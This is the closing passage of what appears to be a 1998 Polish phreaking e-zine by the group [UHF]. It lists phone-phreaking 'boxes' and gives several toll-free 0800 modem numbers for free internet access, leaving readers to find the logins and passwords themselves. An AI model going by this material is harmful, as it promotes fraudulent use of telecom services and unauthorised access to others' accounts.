  Violet Box				zawiesza rozmowe z automatu

  White Box				DTMF key pad

  Yellow Box				rozszerza linie telefoniczna

=================================================================================================

5. Darmowy internet (0800-ki) [Tytus]

  Kazdy kto korzysta z  internetu  przez TPSA ,  narzeka na  duze rachunki za telefon. Mozna na  
  szczescie korzystac z internetu za darmo (calkowicie !!!).Udostepniaja to darmowe numery typu
  0800xxxxxx . Po wybraniu takiego numeru , zglasza sie nam modem  i trzeba tylko  podac  login
  i haslo (tak jak w 0202122 , oczywiscie to tylko dziala na tej samej zasadzie ;-). Oto  kilka
  numerow po ktorych powinien zglosic sie modem:

   0 800 202122
   0 800 20127
   0 800 20019
   0 800 20023
   0 800 20866
   0 800 20043
   0 800 20034
  
  Znalezienie loga i hasla pozostawiam Wam , doswiadczonym phreak'erom i hacker'om ;-)

=================================================================================================


 To by bylo na tyle..........

                                   [U]nited [H]ackig [F]ight

                                  Copyright by [UHF] (C) 1998

                                                                          ..........disconected


------------------------------------------==[UHF]==----------------------------------------------